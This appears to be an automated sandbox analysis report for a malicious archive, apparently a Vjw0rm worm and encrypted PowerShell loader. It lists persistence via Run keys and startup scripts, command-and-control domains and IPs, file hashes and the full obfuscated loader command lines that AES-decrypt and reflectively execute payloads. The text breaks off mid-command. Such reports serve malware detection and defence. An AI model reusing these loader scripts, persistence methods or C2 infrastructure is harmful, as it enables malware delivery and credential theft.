Analysis Overview
SHA256
94e303522613e9d7826ae18fcc1a124b0293f21c4a44dc0da59e9ef50697fb5e
Threat Level: Known bad
The file 3.7z was found to be: Known bad.
Malicious Activity Summary
Vjw0rm
Blocklisted process makes network request
Executes dropped EXE
Drops startup file
Checks computer location settings
Reads user/profile data of web browsers
Checks installed software on the system
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Drops file in System32 directory
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: CmdExeWriteProcessMemorySpam
Script User-Agent
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: AddClipboardFormatListener
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-03-29 11:10
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2023-03-29 11:10
Reported
2023-03-29 11:13
Platform
win10v2004-20230220-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Vjw0rm
Blocklisted process makes network request
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\wscript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.js | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xQgwkAjhRq.js | C:\Windows\System32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xQgwkAjhRq.js | C:\Windows\System32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.js | C:\Windows\System32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xQgwkAjhRq.js | C:\Windows\System32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\1.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\1.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\1.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\1.js\"" | C:\Windows\system32\wscript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3832 wrote to memory of 4892 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 3832 wrote to memory of 4892 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 3832 wrote to memory of 4840 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 3832 wrote to memory of 4840 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 4840 wrote to memory of 1576 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 4840 wrote to memory of 1576 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\wscript.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\1.js
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\xQgwkAjhRq.js"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\1.js"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\xQgwkAjhRq.js"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | javaautorun.duia.ro | udp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ebuleakonangookpala.dynamic-dns.net | udp |
| BG | 193.42.32.233:9202 | ebuleakonangookpala.dynamic-dns.net | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| US | 52.152.110.14:443 | tcp | |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| BG | 193.42.32.233:9202 | ebuleakonangookpala.dynamic-dns.net | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| US | 20.42.73.27:443 | tcp | |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| US | 52.152.110.14:443 | tcp | |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| US | 8.8.8.8:53 | 44.8.109.52.in-addr.arpa | udp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| BG | 193.42.32.233:9202 | ebuleakonangookpala.dynamic-dns.net | tcp |
| NL | 173.223.113.164:443 | tcp | |
| NL | 173.223.113.131:80 | tcp | |
| US | 204.79.197.203:80 | tcp | |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| US | 93.184.221.240:80 | tcp | |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| US | 93.184.221.240:80 | tcp | |
| NL | 173.223.113.131:80 | tcp | |
| US | 52.152.110.14:443 | tcp | |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| BG | 193.42.32.233:9202 | ebuleakonangookpala.dynamic-dns.net | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| US | 52.152.110.14:443 | tcp | |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| BG | 193.42.32.233:9202 | ebuleakonangookpala.dynamic-dns.net | tcp |
| US | 52.152.110.14:443 | tcp | |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| US | 52.152.110.14:443 | tcp | |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| BG | 193.42.32.233:9202 | ebuleakonangookpala.dynamic-dns.net | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
Files
C:\Users\Admin\AppData\Roaming\xQgwkAjhRq.js
| MD5 | 0fbcb6f83b0f64e57835d021bb6e917d |
| SHA1 | 0fa656e1cf06a0ea20e19a4ddd951f0d0d05dc38 |
| SHA256 | c518c547d809de7ccae1259611bcb52d6fa435cff67c910d25c5b961ddc45466 |
| SHA512 | 70f322596a2ba8e079d39d35a10e771f8269dc08e03713736ba070f6cf34cf9bbcb9ac1065a66ad0a0afb66ad68e000953e593164d8858224ce1aeb4cde5120f |
C:\Users\Admin\AppData\Roaming\1.js
| MD5 | 9cf2c793029ae8dd84a387ba66e8c432 |
| SHA1 | 48f6d8e5c4f55434a3d1fdc1531bd37fb6248d10 |
| SHA256 | d76d9fa7fa75a31b2a62804c8925a1c352f407831865bebc005b7f01676b5ac9 |
| SHA512 | 33dd2fbc290c8feb31570e200f469729d5385e3f214edb4299b47bd841a0cd24a9ea211808e6c58cef63a812b27558852dbed2daf0cfac8953b3d028fd019848 |
C:\Users\Admin\AppData\Roaming\xQgwkAjhRq.js
| MD5 | 0fbcb6f83b0f64e57835d021bb6e917d |
| SHA1 | 0fa656e1cf06a0ea20e19a4ddd951f0d0d05dc38 |
| SHA256 | c518c547d809de7ccae1259611bcb52d6fa435cff67c910d25c5b961ddc45466 |
| SHA512 | 70f322596a2ba8e079d39d35a10e771f8269dc08e03713736ba070f6cf34cf9bbcb9ac1065a66ad0a0afb66ad68e000953e593164d8858224ce1aeb4cde5120f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.js
| MD5 | 6940bc4c71745beab1c58afc5d5a6ca0 |
| SHA1 | f5b970ed0dbbc634223278553050b93a259ec4f3 |
| SHA256 | eb95daf1da540e3171caeac9d282b88e336123744f94948593a64adceea0db06 |
| SHA512 | 15d0bf86ec848259b41398f9ecfa03f1b0edac2badf9a71873f758af075512f95c3f1fc813835dc7cee6f6214a40a0a382be79fafbffce74359b4f0892e2c8eb |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.js
| MD5 | 9cf2c793029ae8dd84a387ba66e8c432 |
| SHA1 | 48f6d8e5c4f55434a3d1fdc1531bd37fb6248d10 |
| SHA256 | d76d9fa7fa75a31b2a62804c8925a1c352f407831865bebc005b7f01676b5ac9 |
| SHA512 | 33dd2fbc290c8feb31570e200f469729d5385e3f214edb4299b47bd841a0cd24a9ea211808e6c58cef63a812b27558852dbed2daf0cfac8953b3d028fd019848 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xQgwkAjhRq.js
| MD5 | 0fbcb6f83b0f64e57835d021bb6e917d |
| SHA1 | 0fa656e1cf06a0ea20e19a4ddd951f0d0d05dc38 |
| SHA256 | c518c547d809de7ccae1259611bcb52d6fa435cff67c910d25c5b961ddc45466 |
| SHA512 | 70f322596a2ba8e079d39d35a10e771f8269dc08e03713736ba070f6cf34cf9bbcb9ac1065a66ad0a0afb66ad68e000953e593164d8858224ce1aeb4cde5120f |
Analysis: behavioral3
Detonation Overview
Submitted
2023-03-29 11:10
Reported
2023-03-29 11:13
Platform
win7-20230220-en
Max time kernel
29s
Max time network
33s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\2.js
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dobcia.com | udp |
| RU | 91.213.50.8:443 | dobcia.com | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2023-03-29 11:10
Reported
2023-03-29 11:13
Platform
win10v2004-20230220-en
Max time kernel
59s
Max time network
129s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\2.js
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dobcia.com | udp |
| RU | 91.213.50.8:443 | dobcia.com | tcp |
| US | 8.8.8.8:53 | 8.50.213.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 52.152.108.96:443 | tcp | |
| FR | 40.79.141.154:443 | tcp | |
| US | 8.8.8.8:53 | 151.122.125.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.77.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.36.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.122.125.40.in-addr.arpa | udp |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| NL | 173.223.113.164:443 | tcp | |
| NL | 173.223.113.131:80 | tcp | |
| US | 204.79.197.203:80 | tcp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2023-03-29 11:10
Reported
2023-03-29 11:13
Platform
win7-20230220-en
Max time kernel
27s
Max time network
30s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3.bat.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3.bat.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\3.bat.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1980 wrote to memory of 1940 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1980 wrote to memory of 1940 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1980 wrote to memory of 1940 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1980 wrote to memory of 552 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\3.bat.exe |
| PID 1980 wrote to memory of 552 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\3.bat.exe |
| PID 1980 wrote to memory of 552 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\3.bat.exe |
| PID 1980 wrote to memory of 552 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\3.bat.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\3.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden -c #
C:\Users\Admin\AppData\Local\Temp\3.bat.exe
"C:\Users\Admin\AppData\Local\Temp\3.bat.exe" function fi($s){$s.Replace('PCgSe', '')}$TvSl=fi 'CPCgSehangPCgSeeExPCgSetenPCgSesiPCgSeoPCgSenPCgSe';$uPOI=fi 'CrPCgSeePCgSeaPCgSeteDPCgSeePCgSecrypPCgSetorPCgSe';$JkhJ=fi 'TraPCgSensPCgSefPCgSeormPCgSeFinaPCgSelBloPCgSecPCgSekPCgSe';$wwku=fi 'RePCgSeadLPCgSeinesPCgSe';$mfAv=fi 'GePCgSetPCgSeCPCgSeurrePCgSentPPCgSerocePCgSesPCgSesPCgSe';$LndS=fi 'FirPCgSestPCgSe';$IOON=fi 'LoaPCgSedPCgSe';$bGTU=fi 'EnPCgSetryPCgSePoPCgSeinPCgSetPCgSe';$VfMB=fi 'FroPCgSemBPCgSeasePCgSe6PCgSe4PCgSeStPCgSeriPCgSengPCgSe';$OqGp=fi 'InvPCgSeokPCgSeePCgSe';function zkztS($GNZBX){$cqmSn=[System.Security.Cryptography.Aes]::Create();$cqmSn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$cqmSn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$cqmSn.Key=[System.Convert]::$VfMB('UJReuXeqHSNd3qVXNxnQQ97OnOfSBItpzbPC/7v6/1s=');$cqmSn.IV=[System.Convert]::$VfMB('l+XIW/qwWmYbLeGbOZpElw==');$kDTzC=$cqmSn.$uPOI();$Eyxis=$kDTzC.$JkhJ($GNZBX,0,$GNZBX.Length);$kDTzC.Dispose();$cqmSn.Dispose();$Eyxis;}function JacSh($GNZBX){$BBOCs=New-Object System.IO.MemoryStream(,$GNZBX);$tgHik=New-Object System.IO.MemoryStream;$sqTvH=New-Object System.IO.Compression.GZipStream($BBOCs,[IO.Compression.CompressionMode]::Decompress);$sqTvH.CopyTo($tgHik);$sqTvH.Dispose();$BBOCs.Dispose();$tgHik.Dispose();$tgHik.ToArray();}function OVfya($GNZBX,$xwUmA){[System.Reflection.Assembly]::$IOON([byte[]]$GNZBX).$bGTU.$OqGp($null,$xwUmA);}$ImGss=[System.Linq.Enumerable]::$LndS([System.IO.File]::$wwku([System.IO.Path]::$TvSl([System.Diagnostics.Process]::$mfAv().MainModule.FileName, $null)));$MefbR = $ImGss.Substring(3).Split('\');$TlioL=JacSh (zkztS ([Convert]::$VfMB($MefbR[0])));$MTOPM=JacSh (zkztS ([Convert]::$VfMB($MefbR[1])));OVfya $MTOPM $null;OVfya $TlioL $null;
Network
Files
memory/1940-58-0x000000001B3B0000-0x000000001B692000-memory.dmp
memory/1940-59-0x0000000002290000-0x0000000002298000-memory.dmp
memory/1940-60-0x00000000022D0000-0x0000000002350000-memory.dmp
memory/1940-61-0x00000000022D0000-0x0000000002350000-memory.dmp
memory/1940-62-0x00000000022D0000-0x0000000002350000-memory.dmp
memory/1940-63-0x00000000022DB000-0x0000000002312000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3.bat.exe
| MD5 | 92f44e405db16ac55d97e3bfe3b132fa |
| SHA1 | 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d |
| SHA256 | 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7 |
| SHA512 | f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f |
memory/552-69-0x0000000002150000-0x0000000002190000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2023-03-29 11:10
Reported
2023-03-29 11:13
Platform
win10v2004-20230220-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3.bat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Media_SC.bat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\3.bat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\3.bat.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3.lnk | C:\Users\Admin\AppData\Local\Temp\3.bat.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3.lnk | C:\Users\Admin\AppData\Local\Temp\3.bat.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Media_SC.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\3.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\3.bat.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3 = "C:\\Users\\Admin\\AppData\\Roaming\\3.bat" | C:\Users\Admin\AppData\Local\Temp\3.bat.exe | N/A |
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3.bat.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden -c #
C:\Users\Admin\AppData\Local\Temp\3.bat.exe
"C:\Users\Admin\AppData\Local\Temp\3.bat.exe" function fi($s){$s.Replace('PCgSe', '')}$TvSl=fi 'CPCgSehangPCgSeeExPCgSetenPCgSesiPCgSeoPCgSenPCgSe';$uPOI=fi 'CrPCgSeePCgSeaPCgSeteDPCgSeePCgSecrypPCgSetorPCgSe';$JkhJ=fi 'TraPCgSensPCgSefPCgSeormPCgSeFinaPCgSelBloPCgSecPCgSekPCgSe';$wwku=fi 'RePCgSeadLPCgSeinesPCgSe';$mfAv=fi 'GePCgSetPCgSeCPCgSeurrePCgSentPPCgSerocePCgSesPCgSesPCgSe';$LndS=fi 'FirPCgSestPCgSe';$IOON=fi 'LoaPCgSedPCgSe';$bGTU=fi 'EnPCgSetryPCgSePoPCgSeinPCgSetPCgSe';$VfMB=fi 'FroPCgSemBPCgSeasePCgSe6PCgSe4PCgSeStPCgSeriPCgSengPCgSe';$OqGp=fi 'InvPCgSeokPCgSeePCgSe';function zkztS($GNZBX){$cqmSn=[System.Security.Cryptography.Aes]::Create();$cqmSn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$cqmSn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$cqmSn.Key=[System.Convert]::$VfMB('UJReuXeqHSNd3qVXNxnQQ97OnOfSBItpzbPC/7v6/1s=');$cqmSn.IV=[System.Convert]::$VfMB('l+XIW/qwWmYbLeGbOZpElw==');$kDTzC=$cqmSn.$uPOI();$Eyxis=$kDTzC.$JkhJ($GNZBX,0,$GNZBX.Length);$kDTzC.Dispose();$cqmSn.Dispose();$Eyxis;}function JacSh($GNZBX){$BBOCs=New-Object System.IO.MemoryStream(,$GNZBX);$tgHik=New-Object System.IO.MemoryStream;$sqTvH=New-Object System.IO.Compression.GZipStream($BBOCs,[IO.Compression.CompressionMode]::Decompress);$sqTvH.CopyTo($tgHik);$sqTvH.Dispose();$BBOCs.Dispose();$tgHik.Dispose();$tgHik.ToArray();}function OVfya($GNZBX,$xwUmA){[System.Reflection.Assembly]::$IOON([byte[]]$GNZBX).$bGTU.$OqGp($null,$xwUmA);}$ImGss=[System.Linq.Enumerable]::$LndS([System.IO.File]::$wwku([System.IO.Path]::$TvSl([System.Diagnostics.Process]::$mfAv().MainModule.FileName, $null)));$MefbR = $ImGss.Substring(3).Split('\');$TlioL=JacSh (zkztS ([Convert]::$VfMB($MefbR[0])));$MTOPM=JacSh (zkztS ([Convert]::$VfMB($MefbR[1])));OVfya $MTOPM $null;OVfya $TlioL $null;
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3256);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\3')
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Media_SC.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2164);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden -c #
C:\Users\Admin\AppData\Local\Temp\Media_SC.bat.exe
"C:\Users\Admin\AppData\Local\Temp\Media_SC.bat.exe" function Db($N){$N.Replace('VxHqi', '')}$VTDs=Db 'LoadVxHqi';$ADZU=Db 'GeVxHqitCVxHqiuVxHqirrenVxHqitVxHqiProcVxHqiesVxHqisVxHqi';$ZmeI=Db 'TVxHqiraVxHqinVxHqisfoVxHqirmVxHqiFiVxHqinVxHqialVxHqiBlocVxHqikVxHqi';$rSlJ=Db 'CrVxHqieaVxHqitVxHqieDeVxHqicrVxHqiypVxHqitoVxHqirVxHqi';$gMtj=Db 'RVxHqieadLVxHqiineVxHqisVxHqi';$mYMQ=Db 'EntVxHqiryPoVxHqiintVxHqi';$uoPM=Db 'ChaVxHqingeVxHqiExtVxHqieVxHqinsVxHqiionVxHqi';$Dnti=Db 'FirsVxHqitVxHqi';$qgyV=Db 'InvVxHqioVxHqikeVxHqi';$AnzF=Db 'FrVxHqioVxHqimBVxHqiasVxHqie6VxHqi4SVxHqitrVxHqiiVxHqingVxHqi';function eduzr($pdIWt){$EYVPv=[System.Security.Cryptography.Aes]::Create();$EYVPv.Mode=[System.Security.Cryptography.CipherMode]::CBC;$EYVPv.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$EYVPv.Key=[System.Convert]::$AnzF('4UFXnX30OSBg/EjlyQ9fjGhlnmbo5rsEBxBqLZcJ7jk=');$EYVPv.IV=[System.Convert]::$AnzF('gBEgzZW1Gz1oSSSKvbA72w==');$FqDFb=$EYVPv.$rSlJ();$VPjkE=$FqDFb.$ZmeI($pdIWt,0,$pdIWt.Length);$FqDFb.Dispose();$EYVPv.Dispose();$VPjkE;}function uzNjg($pdIWt){$wxxQI=New-Object System.IO.MemoryStream(,$pdIWt);$wduUe=New-Object System.IO.MemoryStream;$SBwAO=New-Object System.IO.Compression.GZipStream($wxxQI,[IO.Compression.CompressionMode]::Decompress);$SBwAO.CopyTo($wduUe);$SBwAO.Dispose();$wxxQI.Dispose();$wduUe.Dispose();$wduUe.ToArray();}function uLmzf($pdIWt,$nzezJ){[System.Reflection.Assembly]::$VTDs([byte[]]$pdIWt).$mYMQ.$qgyV($null,$nzezJ);}$xTaoc=[System.Linq.Enumerable]::$Dnti([System.IO.File]::$gMtj([System.IO.Path]::$uoPM([System.Diagnostics.Process]::$ADZU().MainModule.FileName, $null)));$ouXIZ = $xTaoc.Substring(3).Split('\');$ViRjv=uzNjg (eduzr ([Convert]::$AnzF($ouXIZ[0])));$bJeLh=uzNjg (eduzr 